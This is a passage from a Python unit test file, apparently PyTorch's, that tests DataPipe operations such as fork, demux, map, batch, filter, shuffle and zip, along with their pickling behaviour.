for i in self.input_dp:
yield i
class IDP(IterDataPipe):
def __init__(self, input_dp):
super().__init__()
self.input_dp = input_dp
self.length = len(input_dp)
def __iter__(self):
for i in self.input_dp:
yield i
def __len__(self):
return self.length
class MDP(MapDataPipe):
def __init__(self, input_dp):
super().__init__()
self.input_dp = input_dp
self.length = len(input_dp)
def __getitem__(self, index):
return self.input_dp[index]
def __len__(self) -> int:
return self.length
def _fake_fn(data, *args, **kwargs):
return data
def _fake_filter_fn(data, *args, **kwargs):
return data >= 5
def _worker_init_fn(worker_id):
random.seed(123)
class TestFunctionalIterDataPipe(TestCase):
# TODO(VitalyFedyunin): If dill is installed, this test fails
def _test_picklable(self):
arr = range(10)
picklable_datapipes: List[Tuple[Type[IterDataPipe], IterDataPipe, Tuple, Dict[str, Any]]] = [
(dp.iter.Mapper, IDP(arr), (), {}),
(dp.iter.Mapper, IDP(arr), (_fake_fn, (0, ), {'test': True}), {}),
(dp.iter.Collator, IDP(arr), (), {}),
(dp.iter.Collator, IDP(arr), (_fake_fn, (0, ), {'test': True}), {}),
(dp.iter.Filter, IDP(arr), (_fake_filter_fn, (0, ), {'test': True}), {}),
]
for dpipe, input_dp, dp_args, dp_kwargs in picklable_datapipes:
p = pickle.dumps(dpipe(input_dp, *dp_args, **dp_kwargs)) # type: ignore[call-arg]
unpicklable_datapipes: List[Tuple[Type[IterDataPipe], IterDataPipe, Tuple, Dict[str, Any]]] = [
(dp.iter.Mapper, IDP(arr), (lambda x: x, ), {}),
(dp.iter.Collator, IDP(arr), (lambda x: x, ), {}),
(dp.iter.Filter, IDP(arr), (lambda x: x >= 5, ), {}),
]
for dpipe, input_dp, dp_args, dp_kwargs in unpicklable_datapipes:
with warnings.catch_warnings(record=True) as wa:
datapipe = dpipe(input_dp, *dp_args, **dp_kwargs) # type: ignore[call-arg]
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"^Lambda function is not supported for pickle")
with self.assertRaises(AttributeError):
p = pickle.dumps(datapipe)
def test_concat_datapipe(self):
input_dp1 = IDP(range(10))
input_dp2 = IDP(range(5))
with self.assertRaisesRegex(ValueError, r"Expected at least one DataPipe"):
dp.iter.Concater()
with self.assertRaisesRegex(TypeError, r"Expected all inputs to be `IterDataPipe`"):
dp.iter.Concater(input_dp1, ()) # type: ignore[arg-type]
concat_dp = input_dp1.concat(input_dp2)
self.assertEqual(len(concat_dp), 15)
self.assertEqual(list(concat_dp), list(range(10)) + list(range(5)))
# Test Reset
self.assertEqual(list(concat_dp), list(range(10)) + list(range(5)))
input_dp_nl = IDP_NoLen(range(5))
concat_dp = input_dp1.concat(input_dp_nl)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(concat_dp)
self.assertEqual(list(concat_dp), list(range(10)) + list(range(5)))
def test_fork_datapipe(self):
input_dp = IDP(range(10))
# Test Case: making sure all child DataPipes share the same reference
dp1, dp2, dp3 = input_dp.fork(num_instances=3)
self.assertTrue(all(n1 is n2 and n1 is n3 for n1, n2, n3 in zip(dp1, dp2, dp3)))
# Test Case: each child DataPipe yields all values, one child at a time
output1, output2, output3 = list(dp1), list(dp2), list(dp3)
self.assertEqual(list(range(10)), output1)
self.assertEqual(list(range(10)), output2)
self.assertEqual(list(range(10)), output3)
# Test Case: two child DataPipes yield values together
dp1, dp2 = input_dp.fork(num_instances=2)
output = []
for n1, n2 in zip(dp1, dp2):
output.append((n1, n2))
self.assertEqual([(i, i) for i in range(10)], output)
# Test Case: one child DataPipe tries to yield all values first, but buffer_size = 5 is too small
dp1, dp2 = input_dp.fork(num_instances=2, buffer_size=5)
it1 = iter(dp1)
for _ in range(5):
next(it1)
with self.assertRaises(BufferError):
next(it1)
# Test Case: two child DataPipes yield values together with buffer_size = 1
dp1, dp2 = input_dp.fork(num_instances=2, buffer_size=1)
output = []
for n1, n2 in zip(dp1, dp2):
output.append((n1, n2))
self.assertEqual([(i, i) for i in range(10)], output)
# Test Case: make sure logic related to slowest_ptr is working properly
dp1, dp2, dp3 = input_dp.fork(num_instances=3)
output1, output2 , output3 = [], [], []
for i, (n1, n2) in enumerate(zip(dp1, dp2)):
output1.append(n1)
output2.append(n2)
if i == 4: # yield all of dp3 when halfway through dp1, dp2
output3 = list(dp3)
break
self.assertEqual(list(range(5)), output1)
self.assertEqual(list(range(5)), output2)
self.assertEqual(list(range(10)), output3)
# Test Case: DataPipe doesn't reset if this pipe hasn't been read
dp1, dp2 = input_dp.fork(num_instances=2)
i1, i2 = iter(dp1), iter(dp2)
output2 = []
for i, n2 in enumerate(i2):
output2.append(n2)
if i == 4:
i1 = iter(dp1) # Doesn't reset because i1 hasn't been read
self.assertEqual(list(range(10)), output2)
# Test Case: child DataPipes reset when some of them have been read
dp1, dp2 = input_dp.fork(num_instances=2)
i1, i2 = iter(dp1), iter(dp2)
output1, output2 = [], []
for i, (n1, n2) in enumerate(zip(i1, i2)):
output1.append(n1)
output2.append(n2)
if i == 4:
with warnings.catch_warnings(record=True) as wa:
i1 = iter(dp1) # Resets all child DataPipes
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
self.assertEqual(list(range(5)) + list(range(10)), output1)
self.assertEqual(list(range(5)) + list(range(10)), output2)
# Test Case: child DataPipes reset, even when some other child DataPipes have not been read
dp1, dp2, dp3 = input_dp.fork(num_instances=3)
output1, output2 = list(dp1), list(dp2)
self.assertEqual(list(range(10)), output1)
self.assertEqual(list(range(10)), output2)
with warnings.catch_warnings(record=True) as wa:
self.assertEqual(list(range(10)), list(dp1)) # Resets even though dp3 has not been read
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
output3 = []
for i, n3 in enumerate(dp3):
output3.append(n3)
if i == 4:
with warnings.catch_warnings(record=True) as wa:
output1 = list(dp1) # Resets even though dp3 is only partially read
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
self.assertEqual(list(range(5)), output3)
self.assertEqual(list(range(10)), output1)
break
self.assertEqual(list(range(10)), list(dp3)) # dp3 has to be read from the start again
# Test Case: Each DataPipe inherits the source datapipe's length
dp1, dp2, dp3 = input_dp.fork(num_instances=3)
self.assertEqual(len(input_dp), len(dp1))
self.assertEqual(len(input_dp), len(dp2))
self.assertEqual(len(input_dp), len(dp3))
def test_demux_datapipe(self):
input_dp = IDP(range(10))
# Test Case: split into 2 DataPipes and output them one at a time
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
output1, output2 = list(dp1), list(dp2)
self.assertEqual(list(range(0, 10, 2)), output1)
self.assertEqual(list(range(1, 10, 2)), output2)
# Test Case: split into 2 DataPipes and output them together
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
output = []
for n1, n2 in zip(dp1, dp2):
output.append((n1, n2))
self.assertEqual([(i, i + 1) for i in range(0, 10, 2)], output)
# Test Case: values of the same classification are lumped together, and buffer_size = 4 is too small
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: 0 if x >= 5 else 1, buffer_size=4)
it1 = iter(dp1)
with self.assertRaises(BufferError):
next(it1) # BufferError is raised because the first 5 elements all belong to the other child
# Test Case: values of the same classification are lumped together, and buffer_size = 5 is just enough
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: 0 if x >= 5 else 1, buffer_size=5)
output1, output2 = list(dp1), list(dp2)
self.assertEqual(list(range(5, 10)), output1)
self.assertEqual(list(range(0, 5)), output2)
# Test Case: classifier returns a value outside of [0, num_instances - 1]
dp = input_dp.demux(num_instances=1, classifier_fn=lambda x: x % 2)
it = iter(dp[0])
with self.assertRaises(ValueError):
next(it)
next(it)
# Test Case: DataPipe doesn't reset when it has not been read
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
i1 = iter(dp1)
output2 = []
i = 0
for i, n2 in enumerate(dp2):
output2.append(n2)
if i == 4:
i1 = iter(dp1)
self.assertEqual(list(range(1, 10, 2)), output2)
# Test Case: child DataPipes reset when some of them have been read
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
output1, output2 = [], []
for n1, n2 in zip(dp1, dp2):
output1.append(n1)
output2.append(n2)
if n1 == 4:
break
with warnings.catch_warnings(record=True) as wa:
i1 = iter(dp1) # Reset all child DataPipes
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
for n1, n2 in zip(dp1, dp2):
output1.append(n1)
output2.append(n2)
self.assertEqual([0, 2, 4] + list(range(0, 10, 2)), output1)
self.assertEqual([1, 3, 5] + list(range(1, 10, 2)), output2)
# Test Case: child DataPipes reset, even when not all of them are exhausted
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
output1 = list(dp1)
self.assertEqual(list(range(0, 10, 2)), output1)
with warnings.catch_warnings(record=True) as wa:
self.assertEqual(list(range(0, 10, 2)), list(dp1)) # Reset even when dp2 is not read
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
output2 = []
for i, n2 in enumerate(dp2):
output2.append(n2)
if i == 1:
self.assertEqual(list(range(1, 5, 2)), output2)
with warnings.catch_warnings(record=True) as wa:
self.assertEqual(list(range(0, 10, 2)), list(dp1)) # Can reset even when dp2 is partially read
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
break
output2 = list(dp2) # dp2 has to be read from the beginning again
self.assertEqual(list(range(1, 10, 2)), output2)
# Test Case: drop_none = True
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2 if x % 5 != 0 else None,
drop_none=True)
self.assertEqual([2, 4, 6, 8], list(dp1))
self.assertEqual([1, 3, 7, 9], list(dp2))
# Test Case: drop_none = False
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2 if x % 5 != 0 else None,
drop_none=False)
it1 = iter(dp1)
with self.assertRaises(ValueError):
next(it1)
# Test Case: __len__ not implemented
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
with self.assertRaises(TypeError):
len(dp1) # It is not implemented as we do not know length for each child in advance
with self.assertRaises(TypeError):
len(dp2)
@suppress_warnings # Suppress warning for lambda fn
def test_map_datapipe(self):
input_dp = IDP(range(10))
def fn(item, dtype=torch.float, *, sum=False):
data = torch.tensor(item, dtype=dtype)
return data if not sum else data.sum()
map_dp = input_dp.map(fn)
self.assertEqual(len(input_dp), len(map_dp))
for x, y in zip(map_dp, input_dp):
self.assertEqual(x, torch.tensor(y, dtype=torch.float))
map_dp = input_dp.map(fn=fn, fn_args=(torch.int, ), fn_kwargs={'sum': True})
self.assertEqual(len(input_dp), len(map_dp))
for x, y in zip(map_dp, input_dp):
self.assertEqual(x, torch.tensor(y, dtype=torch.int).sum())
from functools import partial
map_dp = input_dp.map(partial(fn, dtype=torch.int, sum=True))
self.assertEqual(len(input_dp), len(map_dp))
for x, y in zip(map_dp, input_dp):
self.assertEqual(x, torch.tensor(y, dtype=torch.int).sum())
input_dp_nl = IDP_NoLen(range(10))
map_dp_nl = input_dp_nl.map(lambda x: x)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(map_dp_nl)
for x, y in zip(map_dp_nl, input_dp_nl):
self.assertEqual(x, torch.tensor(y, dtype=torch.float))
@suppress_warnings # Suppress warning for lambda fn
def test_map_tuple_list_with_col_datapipe(self):
def fn_11(d):
return -d
def fn_1n(d):
return -d, d
def fn_n1(d0, d1):
return d0 + d1
def fn_nn(d0, d1):
return -d0, -d1, d0 + d1
def _helper(ref_fn, fn, input_col=None, output_col=None):
for constr in (list, tuple):
datapipe = IDP([constr((0, 1, 2)), constr((3, 4, 5)), constr((6, 7, 8))])
res_dp = datapipe.map(fn, input_col, output_col)
ref_dp = datapipe.map(ref_fn)
self.assertEqual(list(res_dp), list(ref_dp))
# Reset
self.assertEqual(list(res_dp), list(ref_dp))
# Replacing with one input column and default output column
_helper(lambda data: (data[0], -data[1], data[2]), fn_11, 1)
_helper(lambda data: (data[0], (-data[1], data[1]), data[2]), fn_1n, 1)
# The index of input column is out of range
with self.assertRaises(IndexError):
_helper(None, fn_1n, 3)
# Unmatched input columns with fn arguments
with self.assertRaises(TypeError):
_helper(None, fn_n1, 1)
# Replacing with multiple input columns and default output column (the left-most input column)
_helper(lambda data: (data[1], data[2] + data[0]), fn_n1, [2, 0])
_helper(lambda data: (data[0], (-data[2], -data[1], data[2] + data[1])), fn_nn, [2, 1])
# output_col can only be specified when input_col is not None
with self.assertRaises(ValueError):
_helper(None, fn_n1, None, 1)
# output_col can only be single-element list or tuple
with self.assertRaises(ValueError):
_helper(None, fn_n1, None, [0, 1])
# Single-element list as output_col
_helper(lambda data: (-data[1], data[1], data[2]), fn_11, 1, [0])
# Replacing with one input column and single specified output column
_helper(lambda data: (-data[1], data[1], data[2]), fn_11, 1, 0)
_helper(lambda data: (data[0], data[1], (-data[1], data[1])), fn_1n, 1, 2)
# The index of output column is out of range
with self.assertRaises(IndexError):
_helper(None, fn_1n, 1, 3)
_helper(lambda data: (data[0], data[0] + data[2], data[2]), fn_n1, [0, 2], 1)
_helper(lambda data: ((-data[1], -data[2], data[1] + data[2]), data[1], data[2]), fn_nn, [1, 2], 0)
# Appending the output at the end
_helper(lambda data: (*data, -data[1]), fn_11, 1, -1)
_helper(lambda data: (*data, (-data[1], data[1])), fn_1n, 1, -1)
_helper(lambda data: (*data, data[0] + data[2]), fn_n1, [0, 2], -1)
_helper(lambda data: (*data, (-data[1], -data[2], data[1] + data[2])), fn_nn, [1, 2], -1)
@suppress_warnings # Suppress warning for lambda fn
def test_map_dict_with_col_datapipe(self):
def fn_11(d):
return -d
def fn_1n(d):
return -d, d
def fn_n1(d0, d1):
return d0 + d1
def fn_nn(d0, d1):
return -d0, -d1, d0 + d1
# Prevent in-place modification so that resetting works
def _dict_update(data, newdata, remove_idx=None):
_data = dict(data)
_data.update(newdata)
if remove_idx:
for idx in remove_idx:
del _data[idx]
return _data
def _helper(ref_fn, fn, input_col=None, output_col=None):
datapipe = IDP([{"x": 0, "y": 1, "z": 2},
{"x": 3, "y": 4, "z": 5},
{"x": 6, "y": 7, "z": 8}])
res_dp = datapipe.map(fn, input_col, output_col)
ref_dp = datapipe.map(ref_fn)
self.assertEqual(list(res_dp), list(ref_dp))
# Reset
self.assertEqual(list(res_dp), list(ref_dp))
# Replacing with one input column and default output column
_helper(lambda data: _dict_update(data, {"y": -data["y"]}), fn_11, "y")
_helper(lambda data: _dict_update(data, {"y": (-data["y"], data["y"])}), fn_1n, "y")
# The key of input column is not in dict
with self.assertRaises(KeyError):
_helper(None, fn_1n, "a")
# Unmatched input columns with fn arguments
with self.assertRaises(TypeError):
_helper(None, fn_n1, "y")
# Replacing with multiple input columns and default output column (the left-most input column)
_helper(lambda data: _dict_update(data, {"z": data["x"] + data["z"]}, ["x"]), fn_n1, ["z", "x"])
_helper(lambda data: _dict_update(data, {"z": (-data["z"], -data["y"], data["y"] + data["z"])}, ["y"]), fn_nn, ["z", "y"])
# output_col can only be specified when input_col is not None
with self.assertRaises(ValueError):
_helper(None, fn_n1, None, "x")
# output_col can only be single-element list or tuple
with self.assertRaises(ValueError):
_helper(None, fn_n1, None, ["x", "y"])
# Single-element list as output_col
_helper(lambda data: _dict_update(data, {"x": -data["y"]}), fn_11, "y", ["x"])
# Replacing with one input column and single specified output column
_helper(lambda data: _dict_update(data, {"x": -data["y"]}), fn_11, "y", "x")
_helper(lambda data: _dict_update(data, {"z": (-data["y"], data["y"])}), fn_1n, "y", "z")
_helper(lambda data: _dict_update(data, {"y": data["x"] + data["z"]}), fn_n1, ["x", "z"], "y")
_helper(lambda data: _dict_update(data, {"x": (-data["y"], -data["z"], data["y"] + data["z"])}), fn_nn, ["y", "z"], "x")
# Adding new key to dict for the output
_helper(lambda data: _dict_update(data, {"a": -data["y"]}), fn_11, "y", "a")
_helper(lambda data: _dict_update(data, {"a": (-data["y"], data["y"])}), fn_1n, "y", "a")
_helper(lambda data: _dict_update(data, {"a": data["x"] + data["z"]}), fn_n1, ["x", "z"], "a")
_helper(lambda data: _dict_update(data, {"a": (-data["y"], -data["z"], data["y"] + data["z"])}), fn_nn, ["y", "z"], "a")
# TODO(VitalyFedyunin): If dill is installed, this test fails
def _test_map_datapipe_nested_level(self):
input_dp = IDP([list(range(10)) for _ in range(3)])
def fn(item, *, dtype=torch.float):
return torch.tensor(item, dtype=dtype)
with warnings.catch_warnings(record=True) as wa:
map_dp = input_dp.map(lambda ls: ls * 2, nesting_level=0)
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"^Lambda function is not supported for pickle")
self.assertEqual(len(input_dp), len(map_dp))
for x, y in zip(map_dp, input_dp):
self.assertEqual(x, y * 2)
map_dp = input_dp.map(fn, nesting_level=1)
self.assertEqual(len(input_dp), len(map_dp))
for x, y in zip(map_dp, input_dp):
self.assertEqual(len(x), len(y))
for a, b in zip(x, y):
self.assertEqual(a, torch.tensor(b, dtype=torch.float))
map_dp = input_dp.map(fn, nesting_level=-1)
self.assertEqual(len(input_dp), len(map_dp))
for x, y in zip(map_dp, input_dp):
self.assertEqual(len(x), len(y))
for a, b in zip(x, y):
self.assertEqual(a, torch.tensor(b, dtype=torch.float))
map_dp = input_dp.map(fn, nesting_level=4)
with self.assertRaises(IndexError):
list(map_dp)
with self.assertRaises(ValueError):
input_dp.map(fn, nesting_level=-2)
def test_collate_datapipe(self):
arrs = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
input_dp = IDP(arrs)
def _collate_fn(batch):
return torch.tensor(sum(batch), dtype=torch.float)
collate_dp = input_dp.collate(collate_fn=_collate_fn)
self.assertEqual(len(input_dp), len(collate_dp))
for x, y in zip(collate_dp, input_dp):
self.assertEqual(x, torch.tensor(sum(y), dtype=torch.float))
input_dp_nl = IDP_NoLen(arrs)
collate_dp_nl = input_dp_nl.collate()
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(collate_dp_nl)
for x, y in zip(collate_dp_nl, input_dp_nl):
self.assertEqual(x, torch.tensor(y))
def test_batch_datapipe(self):
arrs = list(range(10))
input_dp = IDP(arrs)
with self.assertRaises(AssertionError):
input_dp.batch(batch_size=0)
# Default not drop the last batch
bs = 3
batch_dp = input_dp.batch(batch_size=bs)
self.assertEqual(len(batch_dp), 4)
for i, batch in enumerate(batch_dp):
self.assertEqual(len(batch), 1 if i == 3 else bs)
self.assertEqual(batch, arrs[i * bs: i * bs + len(batch)])
# Drop the last batch
bs = 4
batch_dp = input_dp.batch(batch_size=bs, drop_last=True)
self.assertEqual(len(batch_dp), 2)
for i, batch in enumerate(batch_dp):
self.assertEqual(len(batch), bs)
self.assertEqual(batch, arrs[i * bs: i * bs + len(batch)])
input_dp_nl = IDP_NoLen(range(10))
batch_dp_nl = input_dp_nl.batch(batch_size=2)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(batch_dp_nl)
def test_unbatch_datapipe(self):
target_length = 6
prebatch_dp = IDP(range(target_length))
input_dp = prebatch_dp.batch(3)
unbatch_dp = input_dp.unbatch()
self.assertEqual(len(list(unbatch_dp)), target_length)
for i, res in zip(prebatch_dp, unbatch_dp):
self.assertEqual(i, res)
input_dp = IDP([[0, 1, 2], [3, 4, 5]])
unbatch_dp = input_dp.unbatch()
self.assertEqual(len(list(unbatch_dp)), target_length)
for i, res in zip(prebatch_dp, unbatch_dp):
self.assertEqual(i, res)
input_dp = IDP([[[0, 1], [2, 3]], [[4, 5], [6, 7]]])
unbatch_dp = input_dp.unbatch()
expected_dp = [[0, 1], [2, 3], [4, 5], [6, 7]]
self.assertEqual(len(list(unbatch_dp)), 4)
for i, res in zip(expected_dp, unbatch_dp):
self.assertEqual(i, res)
unbatch_dp = input_dp.unbatch(unbatch_level=2)
expected_dp2 = [0, 1, 2, 3, 4, 5, 6, 7]
self.assertEqual(len(list(unbatch_dp)), 8)
for i, res in zip(expected_dp2, unbatch_dp):
self.assertEqual(i, res)
unbatch_dp = input_dp.unbatch(unbatch_level=-1)
self.assertEqual(len(list(unbatch_dp)), 8)
for i, res in zip(expected_dp2, unbatch_dp):
self.assertEqual(i, res)
input_dp = IDP([[0, 1, 2], [3, 4, 5]])
with self.assertRaises(ValueError):
unbatch_dp = input_dp.unbatch(unbatch_level=-2)
for i in unbatch_dp:
print(i)
with self.assertRaises(IndexError):
unbatch_dp = input_dp.unbatch(unbatch_level=5)
for i in unbatch_dp:
print(i)
def test_bucket_batch_datapipe(self):
input_dp = IDP(range(20))
with self.assertRaises(AssertionError):
dp.iter.BucketBatcher(input_dp, batch_size=0)
input_dp_nl = IDP_NoLen(range(20))
bucket_dp_nl = dp.iter.BucketBatcher(input_dp_nl, batch_size=7)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(bucket_dp_nl)
def _helper(**kwargs):
data_len = 100
arrs = list(range(data_len))
random.shuffle(arrs)
input_dp = IDP(arrs)
bucket_dp = dp.iter.BucketBatcher(input_dp, **kwargs)
self.assertEqual(len(bucket_dp), data_len // 3 if kwargs['drop_last'] else data_len // 3 + 1)
def _verify_bucket_sorted(bucket):
# Sort batch in a bucket
bucket = sorted(bucket, key=lambda x: x[0])
flat = [item for batch in bucket for item in batch]
# Elements in the bucket should be sorted
self.assertEqual(flat, sorted(flat))
batch_num = kwargs['batch_num'] if 'batch_num' in kwargs else 100
bucket = []
for idx, d in enumerate(bucket_dp):
self.assertEqual(d, sorted(d))
bucket.append(d)
if idx % batch_num == batch_num - 1:
_verify_bucket_sorted(bucket)
bucket = []
_verify_bucket_sorted(bucket)
def _sort_fn(data):
return sorted(data)
# In-batch shuffle
_helper(batch_size=3, drop_last=False, batch_num=5, sort_key=_sort_fn)
_helper(batch_size=3, drop_last=False, batch_num=2, bucket_num=2, sort_key=_sort_fn)
_helper(batch_size=3, drop_last=True, batch_num=2, sort_key=_sort_fn)
_helper(batch_size=3, drop_last=True, batch_num=2, bucket_num=2, sort_key=_sort_fn)
def test_filter_datapipe(self):
input_ds = IDP(range(10))
def _filter_fn(data, val, clip=False):
if clip:
return data >= val
return True
filter_dp = input_ds.filter(filter_fn=_filter_fn, fn_args=(5, ))
for data, exp in zip(filter_dp, range(10)):
self.assertEqual(data, exp)
filter_dp = input_ds.filter(filter_fn=_filter_fn, fn_kwargs={'val': 5, 'clip': True})
for data, exp in zip(filter_dp, range(5, 10)):
self.assertEqual(data, exp)
with self.assertRaisesRegex(TypeError, r"has no len"):
len(filter_dp)
def _non_bool_fn(data):
return 1
filter_dp = input_ds.filter(filter_fn=_non_bool_fn)
with self.assertRaises(ValueError):
temp = list(filter_dp)
def test_filter_datapipe_nested_list(self):
input_ds = IDP(range(10)).batch(5)
def _filter_fn(data, val):
return data >= val
filter_dp = input_ds.filter(nesting_level=-1, filter_fn=_filter_fn, fn_kwargs={'val': 5})
expected_dp1 = [[5, 6, 7, 8, 9]]
self.assertEqual(len(list(filter_dp)), len(expected_dp1))
for data, exp in zip(filter_dp, expected_dp1):
self.assertEqual(data, exp)
filter_dp = input_ds.filter(nesting_level=-1, drop_empty_batches=False,
filter_fn=_filter_fn, fn_kwargs={'val': 5})
expected_dp2: List[List[int]] = [[], [5, 6, 7, 8, 9]]
self.assertEqual(len(list(filter_dp)), len(expected_dp2))
for data, exp in zip(filter_dp, expected_dp2):
self.assertEqual(data, exp)
with self.assertRaises(IndexError):
filter_dp = input_ds.filter(nesting_level=5, filter_fn=_filter_fn, fn_kwargs={'val': 5})
temp = list(filter_dp)
input_ds = IDP(range(10)).batch(3)
filter_dp = input_ds.filter(lambda ls: len(ls) >= 3)
expected_dp3: List[List[int]] = [[0, 1, 2], [3, 4, 5], [6, 7, 8]]
self.assertEqual(len(list(filter_dp)), len(expected_dp3))
for data, exp in zip(filter_dp, expected_dp3):
self.assertEqual(data, exp)
input_ds = IDP([[[0, 1, 2], [3, 4, 5]], [[6, 7, 8], [1, 2, 3]]])
filter_dp = input_ds.filter(lambda x: x > 3, nesting_level=-1)
expected_dp4 = [[[4, 5]], [[6, 7, 8]]]
self.assertEqual(len(list(filter_dp)), len(expected_dp4))
for data2, exp2 in zip(filter_dp, expected_dp4):
self.assertEqual(data2, exp2)
input_ds = IDP([[[0, 1, 2], [3, 4, 5]], [[6, 7, 8], [1, 2, 3]]])
filter_dp = input_ds.filter(lambda x: x > 7, nesting_level=-1)
expected_dp5 = [[[8]]]
self.assertEqual(len(list(filter_dp)), len(expected_dp5))
for data2, exp2 in zip(filter_dp, expected_dp5):
self.assertEqual(data2, exp2)
input_ds = IDP([[[0, 1], [3, 4]], [[6, 7, 8], [1, 2, 3]]])
filter_dp = input_ds.filter(lambda ls: len(ls) >= 3, nesting_level=1)
expected_dp6 = [[[6, 7, 8], [1, 2, 3]]]
self.assertEqual(len(list(filter_dp)), len(expected_dp6))
for data2, exp2 in zip(filter_dp, expected_dp6):
self.assertEqual(data2, exp2)
def test_sampler_datapipe(self):
input_dp = IDP(range(10))
# Default SequentialSampler
sampled_dp = dp.iter.Sampler(input_dp) # type: ignore[var-annotated]
self.assertEqual(len(sampled_dp), 10)
for i, x in enumerate(sampled_dp):
self.assertEqual(x, i)
# RandomSampler
random_sampled_dp = dp.iter.Sampler(input_dp, sampler=RandomSampler, sampler_kwargs={'replacement': True}) # type: ignore[var-annotated] # noqa: B950
# Requires `__len__` to build SamplerDataPipe
input_dp_nolen = IDP_NoLen(range(10))
with self.assertRaises(AssertionError):
sampled_dp = dp.iter.Sampler(input_dp_nolen)
def test_shuffle_datapipe(self):
exp = list(range(20))
input_ds = IDP(exp)
with self.assertRaises(AssertionError):
shuffle_dp = input_ds.shuffle(buffer_size=0)
for bs in (5, 20, 25):
shuffle_dp = input_ds.shuffle(buffer_size=bs)
self.assertEqual(len(shuffle_dp), len(input_ds))
random.seed(123)
res = list(shuffle_dp)
self.assertEqual(sorted(res), exp)
# Test Deterministic
for num_workers in (0, 1):
random.seed(123)
dl = DataLoader(shuffle_dp, num_workers=num_workers, worker_init_fn=_worker_init_fn)
dl_res = list(dl)
self.assertEqual(res, dl_res)
shuffle_dp_nl = IDP_NoLen(range(20)).shuffle(buffer_size=5)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(shuffle_dp_nl)
def test_zip_datapipe(self):
with self.assertRaises(TypeError):
dp.iter.Zipper(IDP(range(10)), list(range(10))) # type: ignore[arg-type]
zipped_dp = dp.iter.Zipper(IDP(range(10)), IDP_NoLen(range(5))) # type: ignore[var-annotated]
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(zipped_dp)
exp = list((i, i) for i in range(5))
self.assertEqual(list(zipped_dp), exp)
zipped_dp = dp.iter.Zipper(IDP(range(10)), IDP(range(5)))
self.assertEqual(len(zipped_dp), 5)
self.assertEqual(list(zipped_dp), exp)
# Reset
self.assertEqual(list(zipped_dp), exp)
class TestFunctionalMapDataPipe(TestCase):
# TODO(VitalyFedyunin): If dill is installed, this test fails
def _test_picklable(self):
arr = range(10)
picklable_datapipes: List[
Tuple[Type[MapDataPipe], MapDataPipe, Tuple, Dict[str, Any]]
] = [
(dp.map.Mapper, MDP(arr), (), {}),
(dp.map.Mapper, MDP(arr), (_fake_fn, (0,), {'test': True}), {}),
]
for dpipe, input_dp, dp_args, dp_kwargs in picklable_datapipes:
p = pickle.dumps(dpipe(input_dp, *dp_args, **dp_kwargs)) # type: ignore[call-arg]
unpicklable_datapipes: List[
Tuple[Type[MapDataPipe], MapDataPipe, Tuple, Dict[str, Any]]
] = [
(dp.map.Mapper, MDP(arr), (lambda x: x,), {}),
]
for dpipe, input_dp, dp_args, dp_kwargs in unpicklable_datapipes:
with warnings.catch_warnings(record=True) as wa:
datapipe = dpipe(input_dp, *dp_args, **dp_kwargs) # type: ignore[call-arg]
self.assertEqual(len(wa), 1)
self.assertRegex(
str(wa[0].message), r"^Lambda function is not supported for pickle"
)
with self.assertRaises(AttributeError):
p = pickle.dumps(datapipe)
def test_concat_datapipe(self):
input_dp1 = MDP(range(10))
input_dp2 = MDP(range(5))
with self.assertRaisesRegex(ValueError, r"Expected at least one DataPipe"):
dp.map.Concater()
with self.assertRaisesRegex(TypeError, r"Expected all inputs to be `MapDataPipe`"):
dp.map.Concater(input_dp1, ()) # type: ignore[arg-type]
concat_dp = input_dp1.concat(input_dp2)
self.assertEqual(len(concat_dp), 15)
for index in range(15):
self.assertEqual(concat_dp[index], (list(range(10)) + list(range(5)))[index])
self.assertEqual(list(concat_dp), list(range(10)) + list(range(5)))
def test_map_datapipe(self):
arr = range(10)
input_dp = MDP(arr)
def fn(item, dtype=torch.float, *, sum=False):
data = torch.tensor(item, dtype=dtype)
return data if not sum else data.sum()
map_dp = input_dp.map(fn)
self.assertEqual(len(input_dp), len(map_dp))
for index in arr:
self.assertEqual(
map_dp[index], torch.tensor(input_dp[index], dtype=torch.float)
)
map_dp = input_dp.map(fn=fn, fn_args=(torch.int,), fn_kwargs={'sum': True})
self.assertEqual(len(input_dp), len(map_dp))
for index in arr:
self.assertEqual(
map_dp[index], torch.tensor(input_dp[index], dtype=torch.int).sum()
)
from functools import partial
map_dp = input_dp.map(partial(fn, dtype=torch.int, sum=True))
self.assertEqual(len(input_dp), len(map_dp))
for index in arr:
self.assertEqual(
map_dp[index], torch.tensor(input_dp[index], dtype=torch.int).sum()
)
def test_mux_datapipe(self):
# Test Case: Elements are yielded one at a time from each DataPipe, until they are all exhausted
input_dp1 = IDP(range(4))
input_dp2 = IDP(range(4, 8))
